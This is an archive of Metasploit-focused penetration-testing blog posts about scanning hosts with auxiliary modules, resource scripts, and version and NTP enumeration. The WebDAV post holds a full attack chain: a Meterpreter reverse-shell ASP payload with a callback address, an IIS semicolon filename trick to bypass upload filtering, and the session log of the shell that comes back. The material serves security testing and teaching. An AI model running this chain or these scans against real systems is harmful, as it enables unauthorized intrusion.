Showing posts with label auxiliary modules. Show all posts

Wednesday, April 27, 2011

Running Auxiliary Modules Against Multiple Hosts the Smart Way Part 2

In the previous post I talked about using db_services -R to use the information in your database/workspace to throw an auxiliary module at hosts that had port 443 open.

Let's take this one step further...and throw multiple aux modules against the hosts that have port 80 open.

I'm going to use a resource script to do this. The cool thing about resource scripts is that you don't have to run them just at startup; you can run them any time from the console.

msf auxiliary(options) > resource
Usage: resource path1 path2 ...

Run the commands stored in the supplied files.


In this case I want to run two modules against every host that has port 80 open. Here's some code to do it:


set THREADS 10

<ruby>
# Start with an array to hold the modules we want to run
modules = [
  "auxiliary/scanner/http/http_version",
  "auxiliary/scanner/http/options",
]

# Another array for our hosts, filled from the workspace's service table
hosts = []
framework.db.services.each do |service|
  if service.port == 443
    hosts << service.host.address
  end
end

# Loop through each module in the list
modules.each do |mod|
  self.run_single("use #{mod}")
  puts "\nRunning Auxiliary Module #{mod}"
  # For each host with 443 open, set the options and run the module against it
  hosts.each do |rhost|
    self.run_single("set RHOSTS #{rhost}")
    self.run_single("set RPORT 443") # change to the port above
    self.run_single("set SSL TRUE")
    self.run_single("run")
  end
end
</ruby>


Running it:

msf auxiliary(options) > resource /home/user/.msf3/aux_do_dbhosts.rc
resource (/home/user/.msf3/aux_do_dbhosts.rc)> set THREADS 10
THREADS => 10
[*] resource (/home/user/.msf3/aux_do_dbhosts.rc)> Ruby Code (962 bytes)

Running Auxiliary Module auxiliary/scanner/http/http_version
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.106
RPORT => 443
SSL => TRUE
[*] 192.168.1.106 nginx/0.6.32 ( 302-http://192.168.1.106/ )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.107
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.135
RPORT => 443
SSL => TRUE
[*] 192.168.1.135 Apache/2.2.11 (Ubuntu) mod_ssl/2.2.11 OpenSSL/0.9.8g Phusion_Passenger/2.2.15 ( Powered by Phusion Passenger (mod_rails/mod_rack) 2.2.15 )
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.168
RPORT => 443
SSL => TRUE
[*] 192.168.1.168 Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_wsgi/1.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.229
RPORT => 443
SSL => TRUE
[*] 192.168.1.229 Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.3.2-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8 ( Powered by PHP/5.3.2-0.dotdeb.1 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Running Auxiliary Module auxiliary/scanner/http/options
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.100
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
...SNIP...YOU GET THE IDEA...
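The same host-selection logic as an added, stand-alone Ruby example (this is not the post's resource script and not Metasploit code). It deduplicates the hosts and batches them into a single RHOSTS value per module, so each module runs once and THREADS does the parallelism instead of one run per host. The service records, the Service struct and the hypothetical helper names are constructed here; inside msfconsole the records would come from framework.db.services and the commands would go to run_single, exactly as in the post.

```ruby
# Added example, not the post's resource script. Service records are constructed;
# in msfconsole they would come from framework.db.services.
Service = Struct.new(:host, :port, :proto, :name, :state)

# Constructed sample workspace data (not taken from the original page)
SAMPLE_SERVICES = [
  Service.new("192.168.1.10",  443, "tcp", "https", "open"),
  Service.new("192.168.1.106", 443, "tcp", "https", "open"),
  Service.new("192.168.1.106", 80,  "tcp", "http",  "open"),
  Service.new("192.168.1.135", 443, "tcp", "https", "open"),
  Service.new("192.168.1.135", 443, "tcp", "https", "open"),   # duplicate row
  Service.new("192.168.1.140", 443, "tcp", "https", "closed"), # filtered out: not open
  Service.new("192.168.1.245", 80,  "tcp", "http",  "open"),
]

# Hosts that have `port` open over `proto`, deduplicated and sorted so the
# generated script is identical from one run to the next.
def hosts_with_port(services, port, proto = "tcp")
  services.select { |s| s.port == port && s.proto == proto && s.state == "open" }
          .map(&:host).uniq.sort
end

# Build the msfconsole command list. SSL is switched on only for ports listed
# in ssl_ports, which the post's script hard-codes as "set SSL TRUE" for 443.
def resource_commands(services, modules, port, threads: 10, ssl_ports: [443])
  hosts = hosts_with_port(services, port)
  return [] if hosts.empty?
  cmds = ["set THREADS #{threads}"]
  modules.each do |mod|
    cmds << "use #{mod}"
    cmds << "set RHOSTS #{hosts.join(' ')}"   # RHOSTS accepts a space-separated list
    cmds << "set RPORT #{port}"
    cmds << "set SSL #{ssl_ports.include?(port) ? 'true' : 'false'}"
    cmds << "run"
  end
  cmds
end

# Write the commands as a plain .rc file that the `resource` command can load
def write_resource(path, cmds)
  File.write(path, cmds.join("\n") + "\n")
  path
end

if __FILE__ == $PROGRAM_NAME
  mods = %w[auxiliary/scanner/http/http_version auxiliary/scanner/http/options]
  puts resource_commands(SAMPLE_SERVICES, mods, 443)
end
```

Because the output is a plain list of console commands, the generated file can be reviewed before it is loaded, which is also the place to notice a stale workspace (a host that is no longer in scope still showing up in the service table).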


-CG

thanks to hdm and jcran

Monday, April 25, 2011

Running Auxiliary Modules Against Multiple Hosts the Smart Way

So, a couple of cool updates to the Metasploit Framework lately. If you check out db_services you'll see a super handy feature: "-R".


msf auxiliary(http_version) > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]

-a Search for a list of addresses
-c Only show the given columns
-h,--help Show this help information
-n Search for a list of service names
-p Search for a list of ports
-r Only show [tcp|udp] services
-u,--up Only show services which are up
-o Send output to a file in csv format
-R,--rhosts Set RHOSTS from the results of the search

Available columns: created_at, info, name, port, proto, state, updated_at

In the past you could list your hosts by port (db_services -p 80), but I want to be able to USE those hosts and throw modules at them. Enter the -R option:

msf auxiliary(http_version) > use auxiliary/scanner/http/options
msf auxiliary(options) > db_services -R -p 80

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.245 80 tcp http open Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 )
192.168.1.246 80 tcp http open Apache/2.2.3 (CentOS)
192.168.1.247 80 tcp http open Apache/2.2.12 (Ubuntu)
192.168.1.248 80 tcp http open lighttpd/1.5.0
192.168.1.249 80 tcp http open Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.11
192.168.1.251 80 tcp http open Apache
192.168.1.254 80 tcp http open Apache/2.2.3 (CentOS)

RHOSTS => file:/tmp/msf-db-rhosts-20110423-27121-10wiuni-0

msf auxiliary(options) > run

[*] Scanned 1 of 7 hosts (014% complete)
[*] Scanned 2 of 7 hosts (028% complete)
[*] 192.168.1.247 allows GET,HEAD,POST,OPTIONS methods
[*] Scanned 3 of 7 hosts (042% complete)
[*]192.168.1.248 allows OPTIONS, GET, HEAD, POST methods
[*] Scanned 4 of 7 hosts (057% complete)
[*] 192.168.1.249 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 5 of 7 hosts (071% complete)
[*] Scanned 6 of 7 hosts (085% complete)
[*] Scanned 7 of 7 hosts (100% complete)
[*] Auxiliary module execution completed

-CG

Saturday, September 4, 2010

Grabbing Index Pages Of Webservers

Grabbing the index pages of web servers seems like a no-brainer and something every pentester is going to perform on a test. The problem I ran into is how you get this info once you're inside and using Meterpreter as your pivot into the network.

Your current options are to port-forward to each host, or to set up a route via your Meterpreter session and run some sort of auxiliary module. You can TCP port scan to find open ports or use the http_version module to see the server version, but you don't get a feel for what's actually on the site.

I opted to write something that would scan a range, perform an HTTP GET of / on each IP, then take the resulting body from the response, which should be HTML, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24

msf auxiliary(http_index_grabber) > run

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html

[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/

[-] Received 403 for 209.20.85.8:80/

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/


You can then check out the folder with the results.
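The decision the post describes (GET /, keep a 200 body on disk, note redirects and errors), as an added Ruby example that is not the http_index_grabber module's code. It adds a <title> summary so you get a feel for each site without opening every saved file. The Response struct, the sample sweep and the helper names are constructed assumptions; the real module gets its responses from Metasploit's HttpClient mixin.

```ruby
# Added example, not the http_index_grabber module's code. Responses are
# constructed Structs standing in for what the HTTP client would return.
require 'tmpdir'

Response = Struct.new(:code, :headers, :body)

# Pull the page title out of an HTML body (nil if there is none)
def page_title(body)
  m = body.to_s.match(%r{<title[^>]*>(.*?)</title>}im)
  m ? m[1].strip.gsub(/\s+/, ' ') : nil
end

# Classify one response the way the post's output lines do.
# Returns [tag, message, saved_path_or_nil]; tag is +, * or - as in msfconsole.
def classify_index(host, port, res, logdir, stamp)
  return ["-", "no response for #{host}:#{port}/", nil] if res.nil?
  case res.code
  when 200
    path = File.join(logdir, "#{host}_#{stamp}.html")
    File.write(path, res.body.to_s)
    title = page_title(res.body)
    note = title ? " (title: #{title})" : ""
    ["+", "Received a HTTP 200...Logging to file: #{path}#{note}", path]
  when 301, 302, 303, 307, 308
    ["*", "Received #{res.code} to #{res.headers['Location']} for #{host}:#{port}/", nil]
  else
    ["-", "Received #{res.code} for #{host}:#{port}/", nil]
  end
end

# Constructed sweep results: host => response (nil = no answer at all)
SAMPLE_SWEEP = {
  "10.0.0.4"  => Response.new(200, {}, "<html><head><title> Intranet\n Portal </title></head></html>"),
  "10.0.0.8"  => Response.new(403, {}, ""),
  "10.0.0.10" => Response.new(301, { "Location" => "http://intranet.example/" }, ""),
  "10.0.0.12" => nil,
}

# Run the sweep; returns host => saved file for every 200 response
def grab_indexes(sweep, logdir, stamp)
  saved = {}
  sweep.each do |host, res|
    tag, msg, path = classify_index(host, 80, res, logdir, stamp)
    puts "[#{tag}] #{msg}"
    saved[host] = path if path
  end
  saved
end

if __FILE__ == $PROGRAM_NAME
  grab_indexes(SAMPLE_SWEEP, Dir.mktmpdir, Time.now.strftime("%Y%m%d.%H%M"))
end
```

Saving only the 200 bodies and logging the redirect targets separately keeps the result folder small and makes the redirect lines themselves useful: a 302 to /session/new or /apache2-default/ already tells you what kind of host it is.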


Code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb

Wednesday, May 5, 2010

Metasploit Lotus Domino Version Scanner

I pushed out the first of a few Lotus Domino modules I've been working on to the Metasploit trunk last night.

The first one is a Lotus Domino Version Module.

There is no real "banner grabbing" for versions with Lotus Domino. Really old versions "may" display the version in the server headers, but I've never seen anything above 5.x do this. You usually get something like:

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT
Last-Modified: Wed, 07 Apr 2010 01:39:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5390
Cache-control: private
ETag: W/"MTAtODA4NS1DMTI1NzZENjAwMTVGRDhELTAtMA=="


for headers.

Useful enough to identify that it's a Domino web server, but not so much for using the couple of remote exploits out there, which are very version- and/or fixpack-dependent.

There are a couple of files that the web server may serve up that have version information.

The first being iNotes/FormsX.nsf, which usually has the version information as a comment in the HTML (this can be turned off), and the second being download/filesets/l_LOTUS_SCRIPT.inf-type files, which have the base install version (at least as far as I can tell it's the base install). *If that's not right please let me know*

So let's give it a test drive...

msf > use auxiliary/scanner/lotus/lotus_domino_version
msf auxiliary(lotus_domino_version) > info

Name: Lotus Domino Version
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes path
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

Description:
Checks to determine Lotus Domino Server Version.

msf auxiliary(lotus_domino_version) > set RHOSTS file:/home/user/shodan-domino.txt
RHOSTS => file:/home/user/shodan-domino.txt
msf auxiliary(lotus_domino_version) > run

[*] 192.168.245.101:80 Lotus Domino Current Version: 6.5.4 (Windows NT/Intel)
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.80.132:80 Lotus Domino Current Version: 6.5.5 (Solaris Sparc)
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[-] no response for 192.168.80.132:80 download/filesets/l_SEARCH.inf
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] Scanned 02 of 20 hosts (010% complete)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms5.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms6.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms7.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/l_LOTUS_SCRIPT.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/n_LOTUS_SCRIPT.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/l_SEARCH.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/n_SEARCH.inf
[*] Scanned 04 of 20 hosts (020% complete)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] Scanned 06 of 20 hosts (030% complete)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
...
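The two version sources named above, walked in an added Ruby example (not the lotus_domino_version module's code). It reports each distinct finding once per host, where the run output above repeats the same version for every path that matched. The comment format in the .nsf HTML and the "Version=" line in the .inf files are ASSUMED for the constructed samples, as are the Response struct and the fetch callable standing in for the HTTP client; verify the formats against a real server before relying on them.

```ruby
# Added example, not the lotus_domino_version module's code. Formats of the
# version comment and the .inf line are assumptions used for the constructed data.
Response = Struct.new(:code, :headers, :body)

FORMS_PATHS = %w[iNotes/Forms5.nsf iNotes/Forms6.nsf iNotes/Forms7.nsf].freeze
INF_PATHS   = %w[download/filesets/l_LOTUS_SCRIPT.inf download/filesets/n_LOTUS_SCRIPT.inf
                 download/filesets/l_SEARCH.inf download/filesets/n_SEARCH.inf].freeze

# Assumed format: "<!-- Domino Release 6.5.4 (Windows NT/Intel) -->" in the form HTML
def current_version(body)
  m = body.to_s.match(/<!--\s*Domino Release\s+([^>]+?)\s*-->/i)
  m && m[1]
end

# Assumed format: a "Version=6.0.5.50" line in the .inf file
def base_install_version(body)
  m = body.to_s.match(/^Version\s*=\s*([\d.]+)/i)
  m && m[1]
end

# `fetch` is any callable mapping a path to a Response, or nil for no answer.
# Each category is deduplicated so a version is reported once, not per path.
def domino_versions(fetch)
  findings = { current: [], base: [], redirects: [], missing: [] }
  (FORMS_PATHS + INF_PATHS).each do |path|
    res = fetch.call(path)
    if res.nil?
      findings[:missing] << path
    elsif [301, 302].include?(res.code)
      findings[:redirects] << res.headers['Location']
    elsif res.code == 200
      cur  = current_version(res.body)
      base = base_install_version(res.body)
      findings[:current] << cur  if cur
      findings[:base]    << base if base
    end
  end
  findings.transform_values(&:uniq)
end

# Constructed server: path => Response (a missing key means no response)
SAMPLE_SITE = {
  "iNotes/Forms5.nsf" => Response.new(404, {}, ""),
  "iNotes/Forms6.nsf" => Response.new(200, {}, "<html><!-- Domino Release 6.5.4 (Windows NT/Intel) --><body></body></html>"),
  "iNotes/Forms7.nsf" => Response.new(200, {}, "<html><!-- Domino Release 6.5.4 (Windows NT/Intel) --></html>"),
  "download/filesets/l_LOTUS_SCRIPT.inf" => Response.new(200, {}, "[Version]\nVersion=6.0.5.50\n"),
  "download/filesets/n_LOTUS_SCRIPT.inf" => Response.new(200, {}, "Version=6.0.5.50\r\n"),
  "download/filesets/n_SEARCH.inf" => Response.new(302, { "Location" => "https://10.0.0.9/download/filesets/n_SEARCH.inf" }, ""),
}
SAMPLE_FETCH = ->(path) { SAMPLE_SITE[path] }

if __FILE__ == $PROGRAM_NAME
  domino_versions(SAMPLE_FETCH).each { |k, v| puts "#{k}: #{v.join(', ')}" }
end
```

Keeping the redirect targets is deliberate: the 302-to-HTTPS lines in the run above are not failures, they say the same paths should be retried with SSL on.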

Monday, May 3, 2010

More with Metasploit and WebDAV

intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial; it's not bad. Make sure you pay attention to the part about giving your IUSR_WHATEVER account write access, or you can set up a Windows account to use authentication.

Metasploit has a few modules to test for WebDAV presence.

webdav_scanner:
msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_internal_ip
msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_website_content
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory. If someone has shared out the root directory, it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or, if you have the path wrong:
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If we need to see what options are allowed, you can use the http options auxiliary module.
msf auxiliary(options) > run

[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
To see quickly whether you can upload things, give DAVtest a try, or Ryan Linn's webdav_test module.
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. In this case I can upload php, cgi, jsp and aspx, but nothing is there to execute any of that content.

If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

So we generate our evil.asp file using msfpayload and msfencode; you could also use any other ASP shell...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Upload it and rename it:
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
Now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell:
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that the shell came back with a less-than-desirable privilege level (Network Service). You'll have to work the local angle to elevate, but at least you have a shell.

more info here: http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

Resources:
cadaver: http://www.webdav.org/cadaver/
DAVtest: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit: http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb

Monday, April 5, 2010

Network Time Protocol (NTP) Fun

@hdmoore released a new auxiliary module a few days ago that goes along with the NTP research he has been doing.

msf auxiliary(ntp_monlist) > set RHOSTS time.euro.apple.com

RHOSTS => time.euro.apple.com
msf auxiliary(ntp_monlist) > info

Name: NTP Monitor List Scanner
Version: 8432
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
hdm

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
RHOSTS time.euro.apple.com yes The target address range or CIDR identifier
RPORT 123 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
Obtain the list of recent clients from an NTP server

msf auxiliary(ntp_monlist) >

And when you run the module, it looks a bit like this:

msf auxiliary(ntp_monlist) > run

[*] Sending probes to 17.72.255.11->17.72.255.11 (1 hosts)
[*] 17.72.255.11:123 86.138.33.93:56042 (17.72.255.11)
[*] 17.72.255.11:123 188.192.151.225:52210 (17.72.255.11)
[*] 17.72.255.11:123 81.167.222.18:36866 (17.72.255.11)
[*] 17.72.255.11:123 89.247.73.227:63929 (17.72.255.11)
[*] 17.72.255.11:123 80.39.165.55:123 (17.72.255.11)
[*] 17.72.255.11:123 82.19.218.58:123 (17.72.255.11)
[*] 17.72.255.11:123 82.123.121.154:123 (17.72.255.11)
[*] 17.72.255.11:123 90.207.190.29:123 (17.72.255.11)
[*] 17.72.255.11:123 193.52.24.125:38377 (17.72.255.11)
[*] 17.72.255.11:123 91.10.239.87:64361 (17.72.255.11)
--SNIP--
[*] 17.72.255.11:123 89.241.98.89:27213 (17.72.255.11)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ntp_monlist) >

Other neat shiz...

Sensepost put out a cool post talking about some of the other neat queries you can do using the ntp tools.

http://www.sensepost.com/blog/4552.html

Some quick research into NTP (from www.ntp.org) revealed that NTP servers allow you to perform a bunch of commands that are secondary to time keeping. You can easily play with these using the ntpdc client program, e.g. 'ntpdc target.ntp.server'. Some of these commands include:

  • listpeers - List the peers(NTP servers) for the time server
  • showpeer - Give time keeping info about a specific peer time server
  • peers - List peers and some basic time keeping info
  • sysstats - Info regarding ntp daemon itself


$ ntpq -c readvar time.euro.apple.com
assID=0 status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,version="ntpd 4.2.2@1.1532-o Mon Sep 24
01:42:27 UTC 2007 (1)", processor="i386", system="Darwin/9.6.0", leap=00, stratum=2, precision=-20, rootdelay=0.682, rootdispersion=10.719, peer=8126,
refid=17.72.133.54, reftime=cf648929.538400d4 Mon, Apr 5 2010 12:07:05.326, poll=7, clock=cf648a97.2560d91c Mon, Apr 5 2010 12:13:11.146, state=4, offset=0.149, frequency=43.608, jitter=0.058, noise=0.041, stability=0.000, tai=0

$ ntpdc -c peers time.euro.apple.com
remote local st poll reach delay offset disp
=======================================================================
*time1.euro.appl 17.72.255.11 1 128 377 0.00069 0.000155 0.07887
=time2.euro.appl 17.72.255.11 1 128 377 0.00061 0.000177 0.08919
=17.254.0.49 17.72.255.11 1 128 377 0.14996 0.000237 0.06696
=TrueTime.asia.a 17.72.255.11 1 128 377 0.31990 -0.000027 0.04962
=A17-106-100-13. 17.72.255.11 2 128 0 0.17369 0.007904 3.99217
+time4.euro.appl 17.72.255.11 2 32 376 0.00015 -0.000151 0.04303

$ ntpdc -c listpeers time.euro.apple.com
client time1.euro.apple.com
client time2.euro.apple.com
client 17.254.0.49
client TrueTime.asia.apple.com
client A17-106-100-13.apple.com
sym_active time4.euro.apple.com

Of course if you just want to do the monlist yourself you can...

$ ntpdc -c monlist time.euro.apple.com
remote address port local address count m ver code avgint lstint
===============================================================================
94.96.201.223.dynamic. 50951 17.72.255.12 5 3 4 0 0 0
static-86-51-114-108.m 316 17.72.255.12 25 3 4 0 0 0
207-38-154-68.c3-0.ave 40311 17.72.255.12 7 3 4 0 0 0
62-177-171-130.dsl.bbe 501 17.72.255.12 1 3 4 0 0 0
bb6a37ee.virtua.com.br 123 17.72.255.12 1 3 4 0 0 0
p4FC7545E.dip.t-dialin 123 17.72.255.12 1 3 4 0 0 0
--SNIP--


Still Interested?
http://www.ntp.org/documentation.html

Friday, March 19, 2010

F**king With Foursquare Goes MSF Style

mindless foursquare fun goes metasploit style...

msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info

Name: Foursquare Location Poster
Version: $Revision:$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password yes foursquare password
Proxies no Use a proxy chain
